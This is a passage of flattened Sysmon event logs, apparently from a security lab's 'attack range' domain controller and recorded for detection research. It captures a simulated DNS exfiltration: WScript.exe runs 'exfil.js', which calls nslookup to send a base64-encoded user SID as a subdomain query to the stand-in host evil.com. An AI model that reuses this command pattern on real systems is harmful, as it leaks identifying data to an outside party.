process>-udptruefalse127.0.0.1-52762-false127.0.0.1-53domain 354300x8000000000000000201004Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.524{00000000-0000-0000-0000-000000000000}8132<unknown process>-udpfalsefalse127.0.0.1-52761-false127.0.0.1-53domain 354300x8000000000000000201003Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.524{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52761- 354300x8000000000000000201002Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.524{00000000-0000-0000-0000-000000000000}8132<unknown process>-udptruefalse127.0.0.1-52761-false127.0.0.1-53domain 354300x8000000000000000201001Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.523{00000000-0000-0000-0000-000000000000}8132<unknown process>-udpfalsefalse127.0.0.1-52760-false127.0.0.1-53domain 354300x8000000000000000201000Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.523{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52760- 354300x8000000000000000200999Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.523{00000000-0000-0000-0000-000000000000}8132<unknown process>-udptruefalse127.0.0.1-52760-false127.0.0.1-53domain 354300x8000000000000000200998Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.446{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52759- 354300x8000000000000000200997Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.445{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52758- 354300x8000000000000000200996Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.445{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52757- 354300x8000000000000000200995Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.342{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52756- 354300x8000000000000000200994Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.261{00000000-0000-0000-0000-000000000000}2328<unknown process>-udptruefalse127.0.0.1-52751-false127.0.0.1-53domain 23542300x8000000000000000200993Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.464{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=029763B3E7B44234BBEFA1CEDB8EADAF,SHA256=04B7A994246E441D3E3CD6582EA77CF9D5454027B52579005642EF0CE40442D4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000200992Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.464{2E1864BB-17C1-629A-AE40-000000005F02}70362536C:\Windows\system32\conhost.exe{2E1864BB-17C1-629A-AF40-000000005F02}4808C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200991Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.448{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200990Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.448{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200989Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.448{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200988Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.448{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200987Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.448{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C1-629A-AF40-000000005F02}4808C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200986Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.448{2E1864BB-17C1-629A-AD40-000000005F02}25123548C:\Windows\system32\cmd.exe{2E1864BB-17C1-629A-AF40-000000005F02}4808C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200985Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.458{2E1864BB-17C1-629A-AF40-000000005F02}4808C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C1-629A-AD40-000000005F02}2512C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlulj.tmp 2>&1 10341000x8000000000000000200984Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.417{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C1-629A-AE40-000000005F02}7036C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200983Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.417{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C1-629A-AE40-000000005F02}7036C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200982Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.417{2E1864BB-17C1-629A-AE40-000000005F02}70362536C:\Windows\system32\conhost.exe{2E1864BB-17C1-629A-AD40-000000005F02}2512C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200981Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.395{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C1-629A-AE40-000000005F02}7036C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200980Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.379{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200979Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.379{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200978Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.379{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200977Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.379{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200976Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.379{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C1-629A-AD40-000000005F02}2512C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200975Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.379{2E1864BB-17A1-629A-783D-000000005F02}55523620C:\Windows\System32\WScript.exe{2E1864BB-17C1-629A-AD40-000000005F02}2512C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200974Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.390{2E1864BB-17C1-629A-AD40-000000005F02}2512C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlulj.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000200973Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.379{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlwgx.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000200972Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.332{2E1864BB-17C1-629A-AB40-000000005F02}42007960C:\Windows\system32\conhost.exe{2E1864BB-17C1-629A-AC40-000000005F02}2316C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200971Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.332{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200970Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.316{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200969Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.316{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200968Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.316{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200967Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.316{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C1-629A-AC40-000000005F02}2316C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200966Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.316{2E1864BB-17C1-629A-AA40-000000005F02}76445400C:\Windows\system32\cmd.exe{2E1864BB-17C1-629A-AC40-000000005F02}2316C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200965Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 